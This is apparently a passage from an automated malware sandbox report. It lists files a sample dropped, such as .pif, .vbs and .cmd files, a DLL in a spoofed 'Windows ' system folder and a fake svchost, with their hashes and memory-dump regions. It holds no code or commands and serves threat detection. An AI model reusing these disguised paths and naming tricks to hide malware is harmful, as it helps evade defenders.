              8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

            • C:\Users\Public\Libraries\xbnitqnH.pif

              Filesize

              171KB

              MD5

              22331abcc9472cc9dc6f37faf333aa2c

              SHA1

              2a001c30ba79a19ceaf6a09c3567c70311760aa4

              SHA256

              bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

              SHA512

              c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

            • C:\Users\Public\Upha.pif

              Filesize

              70KB

              MD5

              3fb5cf71f7e7eb49790cb0e663434d80

              SHA1

              b4979a9f970029889713d756c3f123643dde73da

              SHA256

              41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

              SHA512

              2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

            • C:\Users\Public\aken.pif

              Filesize

              442KB

              MD5

              04029e121a0cfa5991749937dd22a1d9

              SHA1

              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

              SHA256

              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

              SHA512

              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

            • C:\Users\Public\aloha.vbs

              Filesize

              194B

              MD5

              71efa4ec6c67fa5665b1d0c64d60fc25

              SHA1

              f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

              SHA256

              08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

              SHA512

              7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

            • C:\Users\Public\alpha.pif

              Filesize

              283KB

              MD5

              8a2122e8162dbef04694b9c3e0b6cdee

              SHA1

              f1efb0fddc156e4c61c5f78a54700e4e7984d55d

              SHA256

              b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

              SHA512

              99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

            • C:\Users\Public\df.cmd

              Filesize

              988KB

              MD5

              3353a1cc2a5dabca2e40faa9d5520cf4

              SHA1

              a98b8be630118989f3beceecc34fd524dae0f05c

              SHA256

              5c1f323caf7247e020dcfcd4cfc413afb6a19828fd4f9099c24f3635c62c8698

              SHA512

              fa4e3f1c4b7dfcc66c6c4d8fd2a91821d5a06bc9c282b03b15392e1bb6175d2679837a8d3143bf7b32ed252bacd8c295337a2fec11cefc3deda70a02215d4930

            • C:\Users\Public\ript.exe

              Filesize

              157KB

              MD5

              24590bf74bbbbfd7d7ac070f4e3c44fd

              SHA1

              cdfe517d07f18623778829aa98d6bbadd3f294cd

              SHA256

              ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

              SHA512

              ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

            • C:\Windows \SysWOW64\NETUTILS.dll

              Filesize

              116KB

              MD5

              0f088756537e0d65627ed2ea392dcaae

              SHA1

              983eb3818223641c13464831a2baad9466c3750f

              SHA256

              abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

              SHA512

              d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

            • C:\Windows \SysWOW64\svchost.pif

              Filesize

              94KB

              MD5

              869640d0a3f838694ab4dfea9e2f544d

              SHA1

              bdc42b280446ba53624ff23f314aadb861566832

              SHA256

              0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

              SHA512

              6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

            • memory/2192-10-0x000001EB4BB60000-0x000001EB4BB82000-memory.dmp

              Filesize

              136KB

            • memory/3440-507-0x0000000000400000-0x0000000000552000-memory.dmp

              Filesize

              1.3MB

            • memory/4508-74-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-85-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-106-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-105-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-104-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-103-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-102-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-101-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-100-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-98-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-97-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-96-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-93-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-91-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-90-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-88-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-84-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-111-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-80-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-75-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-99-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-108-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-73-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-95-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-94-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-72-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-71-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-92-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-70-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-89-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-86-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-107-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-68-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-83-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-59-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-82-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-67-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-81-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-66-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-79-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-78-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-65-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-77-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-76-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-64-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-63-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-62-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-61-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-58-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-57-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-55-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-54-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-109-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-110-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-112-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-113-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-87-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-69-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-60-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-56-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-52-0x0000000000400000-0x0000000000500000-memory.dmp

              Filesize

              1024KB

            • memory/4508-50-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            • memory/4508-49-0x0000000002A20000-0x0000000003A20000-memory.dmp

              Filesize

              16.0MB

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.